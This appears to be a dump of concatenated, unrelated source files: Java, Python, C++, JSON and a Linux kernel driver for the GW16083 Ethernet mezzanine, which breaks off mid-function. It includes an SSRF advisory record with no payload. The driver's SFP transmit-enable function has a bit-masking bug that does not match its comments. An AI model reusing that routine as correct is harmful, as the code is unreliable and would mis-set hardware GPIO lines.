new line in the response. The response automatically enables the chunked * encoding and set the content type. * <p> * If the item is a String, the content will be wrapped in quotes and written. * If the item is an Object, then the JSON representation of this object will be written. * <p> * Example of usage: * * <pre> * &#64;Route(path = "/people") * Multi&lt;Person&gt; people(RoutingContext context) { * return ReactiveRoutes.asJsonStream(Multi.createFrom().items( * new Person("superman", 1), * new Person("batman", 2), * new Person("spiderman", 3))); * } * </pre> * * This example produces: * * <pre> * {"name":"superman", "id":1} * {...} * {...} * </pre> * * @param multi the multi to be written * @param <T> the type of item, can be string, object * @return the wrapped multi */ public static <T> Multi<T> asJsonStream(Multi<T> multi) { return new NdjsonMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`")); } /** * Indicates the the given stream should be written as a <em>chunked</em> JSON array in the response. * Returning a {@code multi} wrapped using this method produces a {@code application/json} response. Each item * is written as an JSON object in the response. The response automatically enables the chunked encoding and set the * content type. * <p> * If the item is a String, the content is written in the array. * If the item is an Object, the content is transformed to JSON and written in the array. * <p> * Note that the array is written in the response item by item, without accumulating the data. * * Example of usage: * * <pre> * &#64;Route(path = "/people") * Multi&lt;Person&gt; people(RoutingContext context) { * return ReactiveRoutes.asJsonArray(Multi.createFrom().items( * new Person("superman", 1), * new Person("batman", 2), * new Person("spiderman", 3))); * } * </pre> * * This example produces: {@code [{"name":"superman", "id":1}, {...}, {..,}]} * * @param multi the multi to be written * @param <T> the type of item, can be string or object * @return the wrapped multi */ public static <T> Multi<T> asJsonArray(Multi<T> multi) { return new JsonArrayMulti<>(Objects.requireNonNull(multi, "The passed multi must not be `null`")); } /** * A class allowing to customized how the server sent events are written. * <p> * The {@code data} section of the resulting event is the JSON representation of the result from {@link #data()}. * If {@link #event()} does not return {@code null}, the {@code event} section is written with the result as value. * If {@link #id()} is implemented, the {@code id} section uses this value. * * @param <T> the type of payload, use for the {@code data} section of the event. */ public interface ServerSentEvent<T> { /** * The {@code event} section. * * @return the name of the event. If {@code null}, the written event won't have an {@code event} section */ default String event() { return null; } /** * The {@code data} section. * * @return the object that will be encoded to JSON. Must not be {@code null} */ T data(); /** * The {@code id} section. * If not implemented, an automatic id is inserted. * * @return the id */ default long id() { return -1L; } } }
2,493
330
# Copyright 2021, Google LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Test server optimizers.""" import collections from absl.testing import parameterized import numpy as np import tensorflow as tf from dp_ftrl import optimizer_utils ModelVariables = collections.namedtuple('ModelVariables', 'weights bias') def _create_model_variables(): return ModelVariables( weights=tf.Variable( lambda: tf.zeros(dtype=tf.float32, shape=(784, 10)), name='weights', trainable=True), bias=tf.Variable( lambda: tf.zeros(dtype=tf.float32, shape=(10)), name='bias', trainable=True)) class OptimizerTest(tf.test.TestCase, parameterized.TestCase): def test_deterministic_sgd(self): model_variables = _create_model_variables() grad = tf.nest.map_structure(tf.ones_like, model_variables) optimizer = optimizer_utils.SGDServerOptimizer(learning_rate=0.1) state = optimizer.init_state() for i in range(2): state = optimizer.model_update(state, model_variables, grad, i) self.assertLen(model_variables, 2) # variables initialize with all zeros and update with all ones and learning # rate 0.1 for several steps. flatten_variables = tf.nest.flatten(model_variables) self.assertAllClose(flatten_variables, [-0.2 * np.ones_like(v) for v in flatten_variables]) @parameterized.named_parameters( ('ftrl_m0s2', optimizer_utils.DPFTRLMServerOptimizer, 0, 2, 0.2), ('ftrl_m0.9s2', optimizer_utils.DPFTRLMServerOptimizer, 0.9, 2, 0.29), ('ftrl_m0s3', optimizer_utils.DPFTRLMServerOptimizer, 0, 3, 0.3), ('ftrl_m0.9s3', optimizer_utils.DPFTRLMServerOptimizer, 0.9, 3, 0.561), ('sgd_m0s2', optimizer_utils.DPSGDMServerOptimizer, 0, 2, 0.2), ('sgd_m0.9s2', optimizer_utils.DPSGDMServerOptimizer, 0.9, 2, 0.29), ('sgd_m0s3', optimizer_utils.DPSGDMServerOptimizer, 0, 3, 0.3), ('sgd_m0.9s3', optimizer_utils.DPSGDMServerOptimizer, 0.9, 3, 0.561)) def test_deterministic(self, optimizer_fn, momentum, steps, result): model_variables = _create_model_variables() model_weight_specs = tf.nest.map_structure( lambda v: tf.TensorSpec(v.shape, v.dtype), model_variables) grad = tf.nest.map_structure(tf.ones_like, model_variables) optimizer = optimizer_fn( learning_rate=0.1, momentum=momentum, noise_std=0.0, model_weight_specs=model_weight_specs) state = optimizer.init_state() for i in range(steps): state = optimizer.model_update(state, model_variables, grad, i) self.assertLen(model_variables, 2) # variables initialize with all zeros and update with all ones and learning # rate 0.1 for several steps. flatten_variables = tf.nest.flatten(model_variables) self.assertAllClose(flatten_variables, [-result * np.ones_like(v) for v in flatten_variables]) @parameterized.named_parameters( ('m0s2', 0, 2, False), ('m0.9s2', 0.9, 2, False), ('m0s3', 0.9, 10, False), ('m0s3nes', 0.9, 10, True), ) def test_ftrl_match_keras(self, momentum, steps, nesterov): # FTRL is identical to SGD for unconstrained problem when no noise is added; # it is identical to Keras SGD without learning rate change. lr = 0.1 def _run_ftrl(): model_variables = _create_model_variables() model_weight_specs = tf.nest.map_structure( lambda v: tf.TensorSpec(v.shape, v.dtype), model_variables) grad = tf.nest.map_structure(tf.ones_like, model_variables) optimizer = optimizer_utils.DPFTRLMServerOptimizer( learning_rate=lr, momentum=momentum, noise_std=0.0, model_weight_specs=model_weight_specs, use_nesterov=nesterov) state = optimizer.init_state() for i in range(steps): state = optimizer.model_update(state, model_variables, grad, i) self.assertLen(model_variables, 2) return tf.nest.flatten(model_variables) def _run_keras(): model_variables = tf.nest.flatten(_create_model_variables()) grad = tf.nest.map_structure(tf.ones_like, model_variables) optimizer = tf.keras.optimizers.SGD( learning_rate=lr, momentum=momentum, nesterov=nesterov) for _ in range(steps): optimizer.apply_gradients(zip(grad, model_variables)) return model_variables self.assertAllClose(_run_ftrl(), _run_keras()) if __name__ == '__main__': tf.test.main()
2,077
369
// Copyright (c) 2017-2021, Mudit<NAME>. All rights reserved. // For licensing, see https://github.com/mudita/MuditaOS/LICENSE.md #include <string> #include <memory> #include <at/Result.hpp> #include <at/Commands.hpp> #include <at/ATFactory.hpp> #include "service-cellular/requests/ImeiRequest.hpp" namespace cellular { at::Cmd ImeiRequest::command() { return at::Cmd(at::factory(at::AT::GET_IMEI)); } void ImeiRequest::handle(RequestHandler &h, at::Result &result) { h.handle(*this, result); } std::unique_ptr<ImeiRequest> ImeiRequest::create(const std::string &data, GroupMatch) { return std::make_unique<ImeiRequest>(data); } }; // namespace cellular
292
344
<reponame>anntzer/prettyprinter import ast import pytest from prettyprinter import pformat def test_parsed(): node = ast.parse('value = 42') assert pformat(node, width=999) == """\ ast.Module( body=[ ast.Assign( targets=[ast.Name(id='value', ctx=ast.Store())], value=ast.Num(n=42) ) ] )""" @pytest.mark.parametrize('cls, identifier', [ (ast.Name, 'ast.Name'), (type('Name', (ast.Name,), {'__module__': 'custom'}), 'custom.Name'), ]) def test_pure_node(cls, identifier): name = cls(id='value', ctx=None) assert pformat(name) == "%s(id='value', ctx=None)" % identifier
284
892
{ "schema_version": "1.2.0", "id": "GHSA-63p3-c254-6c5g", "modified": "2022-05-13T01:04:38Z", "published": "2022-05-13T01:04:38Z", "aliases": [ "CVE-2019-3395" ], "details": "The WebDAV endpoint in Atlassian Confluence Server and Data Center before version 6.6.7 (the fixed version for 6.6.x), from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), and from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x) allows remote attackers to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance via Server-Side Request Forgery.", "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], "affected": [ ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-3395" }, { "type": "WEB", "url": "https://jira.atlassian.com/browse/CONFSERVER-57971" } ], "database_specific": { "cwe_ids": [ "CWE-918" ], "severity": "CRITICAL", "github_reviewed": false } }
495
335
{ "word": "Ancient", "definitions": [ "Belonging to the very distant past and no longer in existence.", "Having been in existence for a very long time.", "Showing or feeling signs of age or wear." ], "parts-of-speech": "Adjective" }
104
341
<reponame>lleondia/geopandas-tutorial<filename>_solved/solutions/01-introduction-geospatial-data17.py # Add a population density column districts['population_density'] = districts['population'] / districts.geometry.area * 10**6
72
1,656
from datetime import datetime import pytest from marshmallow.exceptions import ValidationError from lemur.common.utils import parse_private_key from lemur.common.validators import verify_private_key_match from lemur.tests.vectors import INTERMEDIATE_CERT, SAN_CERT, SAN_CERT_KEY def test_private_key(session): parse_private_key(SAN_CERT_KEY) with pytest.raises(ValueError): parse_private_key("invalid_private_key") def test_validate_private_key(session): key = parse_private_key(SAN_CERT_KEY) verify_private_key_match(key, SAN_CERT) with pytest.raises(ValidationError): # Wrong key for certificate verify_private_key_match(key, INTERMEDIATE_CERT) def test_sub_alt_type(session): from lemur.common.validators import sub_alt_type with pytest.raises(ValidationError): sub_alt_type("CNAME") def test_dates(session): from lemur.common.validators import dates dates(dict(validity_start=datetime(2016, 1, 1), validity_end=datetime(2016, 1, 5))) with pytest.raises(ValidationError): dates(dict(validity_start=datetime(2016, 1, 1))) with pytest.raises(ValidationError): dates(dict(validity_end=datetime(2016, 1, 1))) with pytest.raises(ValidationError): dates( dict(validity_start=datetime(2016, 1, 5), validity_end=datetime(2016, 1, 1)) ) with pytest.raises(ValidationError): dates( dict( validity_start=datetime(2016, 1, 1), validity_end=datetime(2016, 1, 10) ) )
634
1,144
/* * drivers/net/phy/gw16083.c * * Driver for GW16083 Ventana Ethernet Expansion Mezzanine * * Author: <NAME> * * Copyright (c) 2014 <NAME> <<EMAIL>> * * This program is free software; you can redistribute it and/or modify it * under the terms of the GNU General Public License as published by the * Free Software Foundation; either version 2 of the License, or (at your * option) any later version. * */ /* * The GW16083 interfaces with a Ventana baseboard via the PCIe bus, an i2c * bus (i2c2), and a couple of GPIO's. On the PCIe bus is an i210 GigE with * its MAC connected to Port4 of a Marvell MV88E6176 7-port GigE switch via * MDIO and RGMII. Ports 0-3 are standard copper RJ45 but Ports 5 and 6 * connect to Marvell MV88E1111 dual-mode Copper/Fiber PHY's over SGMII and * MDIO. The PHY's have both an RG45 for copper and an SFP module. */ #include <linux/kernel.h> #include <linux/string.h> #include <linux/errno.h> #include <linux/unistd.h> #include <linux/i2c.h> #include <linux/interrupt.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/device.h> #include <linux/netdevice.h> #include <linux/etherdevice.h> #include <linux/skbuff.h> #include <linux/spinlock.h> #include <linux/mm.h> #include <linux/module.h> #include <linux/mii.h> #include <linux/ethtool.h> #include <linux/phy.h> #include <linux/marvell_phy.h> #include <linux/of_platform.h> #include <linux/platform_device.h> #include <linux/io.h> #include <asm/irq.h> #include <net/dsa.h> #include <linux/uaccess.h> #include "gw16083.h" #undef FAIL_ON_CHECKSUM_ERR /* fail to configure SFP if checksum bad */ #define PORT_POWER_CONTROL /* ports can be enabled/disabled via sysfs */ #define PORT_MODE_CONTROL /* ports 5/6 can have SFP/RJ45 mode forced */ #define RGMII_DELAY_ON_PHY /* implement Port5/6 tx/rx delay on PHY vs sw */ MODULE_DESCRIPTION("GW16083 driver"); MODULE_AUTHOR("<NAME>"); MODULE_LICENSE("GPL"); struct mv88e1111_port_state { int port; bool present; bool serdes; bool sfp_signal; bool sfp_present; bool sfp_compat; bool sfp_enabled; char sfp_id[64]; }; struct mv88e1111_priv { struct phy_device *phydev; struct i2c_client *client; struct mv88e1111_port_state port5; struct mv88e1111_port_state port6; struct kobject *sysfs_kobj; struct delayed_work work; struct workqueue_struct *workq; }; enum { mode_copper = 0, mode_serdes = 1, }; #if IS_ENABLED(CONFIG_NET_DSA_MV88E6352) static struct dsa_chip_data switch_chip_data = { .port_names = { "lan4", "lan3", "lan2", "lan1", "cpu", "lan5", "lan6", }, }; static struct dsa_platform_data switch_plat_data = { .nr_chips = 1, .chip = &switch_chip_data, }; static struct platform_device switch_device = { .name = "dsa", .id = 0, .num_resources = 0, .dev.platform_data = &switch_plat_data, }; #endif static struct i2c_client *gw16083_client = NULL; static int gw16083_read_port_sfp(struct i2c_client *client, struct mv88e1111_port_state *state); /* read switch port register from port0-6 */ u16 read_switch_port(struct phy_device *pdev, int port, u8 regaddr) { return pdev->bus->read(pdev->bus, MV_BASE + port, regaddr); } /* write switch port register to port0-6 */ int write_switch_port(struct phy_device *pdev, int port, u8 regaddr, u16 val) { return pdev->bus->write(pdev->bus, MV_BASE + port, regaddr, val); } /* * read_switch_port_phy - write a register for a specific port on 88E6176 * The 88E6176 PHY registers must be accessed thorugh the Global2 address * using the SMI_PHY_COMMAND_REG and SMI_PHY_DATA_REG. */ int read_switch_port_phy(struct phy_device *pdev, int port, u8 regaddr) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); u16 reg; int i; dev_dbg(&priv->client->dev, "read_phy: port%d reg=0x%02x\n", port, regaddr); reg = SMIBUSY | SMIMODE22 | SMIOP_READ; reg |= port << DEVADDR; reg |= regaddr << REGADDR; pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND, reg); for (i = 0; i < 10; i++) { reg = pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND); if (!(reg & (1<<15))) break; mdelay(1); } /* timeout */ if (i == 10) return 0xffff; reg = pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_DATA); return reg; } /* * write_switch_port_phy - write a register for a specific port on 88E6176 * The 88E6176 PHY registers must be accessed thorugh the Global2 address * using the SMI_PHY_COMMAND_REG and SMI_PHY_DATA_REG. */ int write_switch_port_phy(struct phy_device *pdev, int port, u8 addr, u16 reg) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); int i; dev_dbg(&priv->client->dev, "write_phy: port%d reg=0x%02x val=0x%04x\n", port, addr, reg); pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_DATA, reg); reg = SMIBUSY | SMIMODE22 | SMIOP_WRITE; reg |= port << DEVADDR; reg |= addr << REGADDR; pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND, reg); for (i = 0; i < 10; i++) { reg = pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SMI_PHY_COMMAND); if (!(reg & (1<<15))) break; mdelay(1); } /* timeout */ if (i == 10) return -ETIMEDOUT; return 0; } /* read a scratch register from switch */ inline u8 read_switch_scratch(struct phy_device *pdev, u8 reg) { pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC, (reg << 8)); return pdev->bus->read(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC) & 0xff; } /* write a scratch register to switch */ inline void write_switch_scratch(struct phy_device *pdev, u8 reg, u8 val) { pdev->bus->write(pdev->bus, MV_GLOBAL2, MV_SCRATCH_MISC, (1 << 15) | (reg << 8) | val); } /* enable or disable an SFP's TXEN signal */ static int enable_sfp_txen(struct phy_device *pdev, int port, bool enable) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); u8 gpio; int bit; if (port != 5 && port != 6) return -EINVAL; /* GPIO[2:1] output low to enable TXEN */ bit = (port == 5) ? 1 : 2; gpio = read_switch_scratch(pdev, MV_GPIO_DATA); if (enable) gpio |= (1 << bit); else gpio &= (1 << bit); write_switch_scratch(pdev, MV_GPIO_DATA, gpio); dev_info(&priv->client->dev, "Port%d: SFP TX %s\n", port, enable ? "enabled" : "disabled"); return 0; } /* configure mv88e1111 port for copper or serdes * For Copper we set auto link/duplex/speed detection * For SerDes/Fiber we force 1000mbps link up and auto-neg duplex */ static int config_mv88e1111_port_sfp(struct phy_device *pdev, int port, bool sfp) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); u16 reg; if (port != 5 && port != 6) return -EINVAL; dev_dbg(&priv->client->dev, "%s: Port%d %s\n", __func__, port, sfp ? "SFP" : "copper"); if (sfp) { enable_sfp_txen(pdev, port, 1); /* configure MV88E6176 Physical Control Port Register */ dev_info(&priv->client->dev, "Port%d: SFP: force 1000mbps link up " "(auto-negotiate duplex)\n", port); reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL); reg &= ~0x3f; /* clear 5-0 */ reg |= (1 << 4) | (1 << 5); /* force link up */ reg |= 2; /* force 1000mbps */ write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, reg); reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL); } /* copper */ else { enable_sfp_txen(pdev, port, 0); /* configure MV88E6176 Physical Control Port Register */ dev_info(&priv->client->dev, "Port%d: Copper: set auto-neg link/duplex/speed\n", port); reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL); reg &= ~0x3f; /* clear 5-0 */ reg |= 3; /* speed not forced */ write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, reg); reg = read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL); } dev_dbg(&priv->client->dev, "%s: Port%d %s PORT_PHYS_CONTROL=0x%04x\n", __func__, port, sfp ? "SFP" : "copper", read_switch_port(pdev, port, MV_PORT_PHYS_CONTROL)); return 0; } #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) && defined(PORT_POWER_CONTROL) static int enable_switch_port(struct phy_device *pdev, int port, bool enable) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); u16 reg; /* power up port */ dev_info(&priv->client->dev, "Port%d: %s\n", port, enable ? "normal operation" : "power down"); reg = read_switch_port_phy(pdev, port, MV_PHY_CONTROL); if (enable) reg &= ~(1 << 11); /* Normal Operation */ else reg |= (1 << 11); /* power down */ write_switch_port_phy(pdev, port, MV_PHY_CONTROL, reg); reg = read_switch_port_phy(pdev, port, MV_PHY_CONTROL1); if (enable) reg &= ~(1 << 2); /* Normal Operation */ else reg |= (1 << 2); /* power down */ write_switch_port_phy(pdev, port, MV_PHY_CONTROL1, reg); return 0; } #endif /* * Sysfs API */ struct mv88e1111_port_state *get_port_state(struct mv88e1111_priv *priv, int port) { if (port == 5) return &priv->port5; if (port == 6) return &priv->port6; return NULL; } /* * get MV88E6176 port number for a specific GW16083 port name * The GW16083 ports as shown on the silkscreen are not mapped according to * the MV88E6176 ports numbers. */ static int gw16083_get_port(const char* name) { int i; int map[] = { 3, 2, 1, 0, 5, 6 }; if (strncasecmp(name, "LAN", 3) != 0) return -1; i = name[3] - '0'; if (i < 1 || i > 6) return -1; return map[i-1]; } #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) static ssize_t port_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); int port = -1; u16 reg; if (sscanf(attr->attr.name, "port%d", &port) != 1) return 0; if (port < 0 || port > 6) return 0; reg = read_switch_port_phy(priv->phydev, port, MV_PHY_CONTROL); return sprintf(buf, "%s\n", (reg & (1 << 11)) ? "disabled" : "enabled"); } #if defined(PORT_POWER_CONTROL) static ssize_t port_store(struct device *dev, struct device_attribute *attr, const char *buf, size_t count) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); int port = -1; int val; port = gw16083_get_port(attr->attr.name); if (port < 0) return 0; if (sscanf(buf, "%d", &val) != 1) return 0; enable_switch_port(priv->phydev, port, val ? 1 : 0); return count; } static DEVICE_ATTR(lan1, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan2, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan3, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan4, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan5, S_IWUSR | S_IRUGO, port_show, port_store); static DEVICE_ATTR(lan6, S_IWUSR | S_IRUGO, port_show, port_store); #else static DEVICE_ATTR(lan1, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan2, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan3, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan4, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan5, S_IRUGO, port_show, NULL); static DEVICE_ATTR(lan6, S_IRUGO, port_show, NULL); #endif #endif /* #if IS_ENABLED(CONFIG_NET_DSA_MV88E6352) */ static ssize_t portmode_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; state = get_port_state(priv, gw16083_get_port(attr->attr.name)); if (!state) return 0; return sprintf(buf, "%s\n", state->serdes ? "SFP" : "RJ45"); } #ifdef PORT_MODE_CONTROL static ssize_t portmode_store(struct device *dev, struct device_attribute *attr, const char *buf, size_t count) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; u16 reg; int port; port = gw16083_get_port(attr->attr.name); state = get_port_state(priv, port); if (!state) return 0; reg = read_switch_port_phy(priv->phydev, port, MII_M1111_PHY_EXT_SR); if (strcasecmp(buf, "auto") == 0) { reg &= ~(1<<15); /* enable auto-selection */ dev_info(&priv->client->dev, "Port%d: enable auto-selection\n", port); } else if (strcasecmp(buf, "RJ45") == 0) { reg |= (1<<15); /* disable auto-selection */ reg |= 0xb; /* RGMII to Copper */ config_mv88e1111_port_sfp(priv->phydev, port, 0); dev_info(&priv->client->dev, "Port%d: select RJ45\n", port); } else if (strcasecmp(buf, "SFP") == 0) { reg |= (1<<15); /* disable auto-selection */ reg |= 0x3; /* RGMII to Fiber */ config_mv88e1111_port_sfp(priv->phydev, port, 1); dev_info(&priv->client->dev, "Port%d: select SFP\n", port); } write_switch_port_phy(priv->phydev, port, MII_M1111_PHY_EXT_SR, reg); return count; } static DEVICE_ATTR(lan5_mode, S_IWUSR | S_IRUGO, portmode_show, portmode_store); static DEVICE_ATTR(lan6_mode, S_IWUSR | S_IRUGO, portmode_show, portmode_store); #else static DEVICE_ATTR(lan5_mode, S_IRUGO, portmode_show, NULL); static DEVICE_ATTR(lan6_mode, S_IRUGO, portmode_show, NULL); #endif static ssize_t portsfp_show(struct device *dev, struct device_attribute *attr, char *buf) { struct mv88e1111_priv *priv = dev_get_drvdata(dev); struct mv88e1111_port_state *state; state = get_port_state(priv, gw16083_get_port(attr->attr.name)); if (!state) return 0; if (!state->sfp_present) return 0; return sprintf(buf, "%s\n", state->sfp_id); } static DEVICE_ATTR(lan5_sfp, S_IRUGO, portsfp_show, NULL); static DEVICE_ATTR(lan6_sfp, S_IRUGO, portsfp_show, NULL); /* * PHY driver */ /* check MV88E1111 PHY status and MV88E6176 GPIO */ static void mv88e6176_work(struct work_struct *work) { struct mv88e1111_priv *priv = container_of(work, struct mv88e1111_priv, work.work); struct phy_device *pdev = priv->phydev; struct device *dev = &priv->client->dev; struct mv88e1111_port_state *state; bool serdes, sfp_present, sfp_signal; int port; u16 gpio; mutex_lock(&pdev->lock); gpio = read_switch_scratch(pdev, MV_GPIO_DATA); for (port = 5; port < 7; port++) { serdes = (read_switch_port_phy(pdev, port, MII_M1111_PHY_EXT_SR) & (1<<13)) ? 1 : 0; dev_dbg(dev, "%s: Port%d GPIO:0x%02x SerDes:%d\n", __func__, port, gpio, serdes); switch(port) { case 5: state = &priv->port5; sfp_present = !((gpio >> 5) & 1); sfp_signal = !((gpio >> 6) & 1); break; case 6: state = &priv->port6; sfp_present = !((gpio >> 3) & 1); sfp_signal = !((gpio >> 4) & 1); break; } /* * on sfp_detect read/verify SFP MSA and set sfp_compat * on sfp_signal issue link down? * on serdes auto-select */ if (state->sfp_present != sfp_present) { state->sfp_present = sfp_present; dev_info(dev, "Port%d: SFP %s\n", port, sfp_present ? "inserted" : "removed"); if (state->sfp_present) { if (gw16083_read_port_sfp(priv->client, state)) state->sfp_compat = false; else state->sfp_compat = true; /* trigger a re-select/enable below */ state->serdes = !serdes; pdev->state = PHY_RUNNING; } else { state->sfp_compat = false; state->sfp_enabled = false; pdev->state = PHY_NOLINK; } } if (state->sfp_signal != sfp_signal) { state->sfp_signal = sfp_signal; dev_info(dev, "Port%d: SFP signal %s\n", port, sfp_signal ? "detected" : "lost"); } if (state->serdes != serdes) { state->serdes = serdes; dev_info(dev, "Port%d: %s auto-selected\n", port, serdes ? "SERDES" : "copper"); /* * if auto-selection has switched to copper * disable serdes */ if (!serdes) { config_mv88e1111_port_sfp(pdev, port, 0); state->sfp_enabled = false; } } /* if compatible SFP module and not yet enabled then enable */ if (state->sfp_compat && state->sfp_signal && !state->sfp_enabled) { if (!config_mv88e1111_port_sfp(pdev, port, 1)) state->sfp_enabled = true; } } mutex_unlock(&pdev->lock); queue_delayed_work(priv->workq, &priv->work, HZ); } static int mv88e6176_read_status(struct phy_device *pdev) { return 0; } static int mv88e6176_config_aneg(struct phy_device *pdev) { return 0; } static int mv88e6176_config_init(struct phy_device *pdev) { pdev->state = PHY_RUNNING; return 0; } static void mv88e6176_remove(struct phy_device *pdev) { struct mv88e1111_priv *priv = dev_get_drvdata(&pdev->dev); dev_dbg(&priv->client->dev, "%s", __func__); destroy_workqueue(priv->workq); #if !IS_ENABLED(CONFIG_NET_DSA_MV88E6352) device_remove_file(&pdev->dev, &dev_attr_lan1); device_remove_file(&pdev->dev, &dev_attr_lan2); device_remove_file(&pdev->dev, &dev_attr_lan3); device_remove_file(&pdev->dev, &dev_attr_lan4); device_remove_file(&pdev->dev, &dev_attr_lan5); device_remove_file(&pdev->dev, &dev_attr_lan6); #endif device_remove_file(&pdev->dev, &dev_attr_lan5_sfp); device_remove_file(&pdev->dev, &dev_attr_lan6_sfp); device_remove_file(&pdev->dev, &dev_attr_lan5_mode); device_remove_file(&pdev->dev, &dev_attr_lan6_mode); sysfs_remove_link(kernel_kobj, "gw16083"); } /* * mv88e6176_probe - called any time an MV88E6176 is found on an mdio bus * Determine if this MV88E6176 is indeed on a GW16083 and if so configure * the port5/port6 phy and register a background procedure for monitoring * their states to support SFP vs Copper switching. * * Verify this is a GW16083 by ensuring: * - the phy address matches that of a GW16083 * - the mdio bus is from an i210 device (igb driver) * - there are MV881111 PHY's hanging off of Port5 and Port6 */ static int mv88e6176_probe(struct phy_device *pdev) { int port; int ret = 0; u32 id, reg; struct mv88e1111_priv *priv; struct device *dev; #if IS_ENABLED(CONFIG_NET_DSA_MV88E6352) struct net_device *netdev = NULL; #endif dev_dbg(&pdev->dev, "%s: addr=0x%02x bus=%s:%s gw16083_client=%p\n", __func__, pdev->addr, pdev->bus->name, pdev->bus->id, gw16083_client); /* In single-chip addressing mode the MV88E6176 shows up on 0x10-0x16 */ if (pdev->addr != MV_BASE) return 0; /* i2c driver needs to be loaded first */ if (!gw16083_client) return 0; dev = &gw16083_client->dev; /* gw16083 has MV88E1676 hanging off of i210 mdio bus */ if (strcmp(pdev->bus->name, "igb_enet_mii_bus") != 0) return 0; /* verify Port5/Port6 have an MV88E1111 PHY hanging off them */ for (port = 5; port < 7; port++) { id = read_switch_port_phy(pdev, port, MII_M1111_PHY_IDENT0) << 16; id |= read_switch_port_phy(pdev, port, MII_M1111_PHY_IDENT1); if ((id & MII_M1111_PHY_ID_MASK) != MII_M1111_PHY_ID) { dev_err(dev, "Port%d: No MV88E1111 PHY detected", port); return 0; } } #if IS_ENABLED(CONFIG_NET_DSA_MV88E6352) /* * Find the netdev this bus is hanging off of and register with DSA: * The netdev must be an Intel I210 (igb) with Gateworks MAC addr */ read_lock(&dev_base_lock); for_each_netdev(&init_net, netdev) { if (netdev->dev.parent && !strcmp(netdev->dev.parent->driver->name, "igb") && (netdev->perm_addr[0] == 0x00) && (netdev->perm_addr[1] == 0xd0) && (netdev->perm_addr[2] == 0x12)) { switch_plat_data.netdev = &netdev->dev; switch_plat_data.chip[0].host_dev = &pdev->bus->dev; break; } } read_unlock(&dev_base_lock); if (switch_plat_data.netdev) { platform_device_register(&switch_device); dev_info(dev, "registered GW16083 DSA switch\n"); } else { dev_err(dev, "failed to find netdev for DSA switch\n"); } #endif /* * port5/6 config: MV88E1111 PHY * Register 20: PHY Control Register * R20_7: add delay to RX_CLK for RXD * R20_1: add delay to TX_CLK for TXD * Register 24: LED Control Register * 0x4111: * Pulse stretch 170 to 340 ms * Register 0: Control Register * R0_15: phy reset */ dev_info(dev, "Configuring MV88E6176 7-port switch"); for (port = 5; port < 7; port++) { #ifdef RGMII_DELAY_ON_PHY /* phy rx/tx delay */ reg = read_switch_port_phy(pdev, port, MII_M1111_PHY_EXT_CR); reg |= (1<<1) | (1<<7); write_switch_port_phy(pdev, port, MII_M1111_PHY_EXT_CR, reg); #else write_switch_port(pdev, port, MV_PORT_PHYS_CONTROL, 0xC003); #endif /* led config */ write_switch_port_phy(pdev, port, MII_M1111_PHY_LED_CONTROL, MII_M1111_PHY_LED_PULSE_STR); /* reset phy */ reg = read_switch_port_phy(pdev, port, MII_M1111_PHY_CONTROL); reg |= MII_M1111_PHY_CONTROL_RESET; write_switch_port_phy(pdev, port, MII_M1111_PHY_CONTROL, reg); dev_info(dev, "Port%d: MV88E111 PHY configured\n", port); } /* * GPIO Configuration: * GPIO1: FIB5_TXEN# (output) * GPIO2: FIB6_TXEN# (output) * GPIO3: FIB6_PRES# (input) * GPIO4: FIB6_LOS (input) * GPIO5: FIB5_PRES# (input) * GPIO6: FIB5_LOS (input) */ write_switch_scratch(pdev, MV_GPIO_DATA, 0x06); /* GPIO[2:1] out hi */ write_switch_scratch(pdev, MV_GPIO_DIR, 0x78); /* GPIO[6:3] inp */ pdev->irq = PHY_POLL; 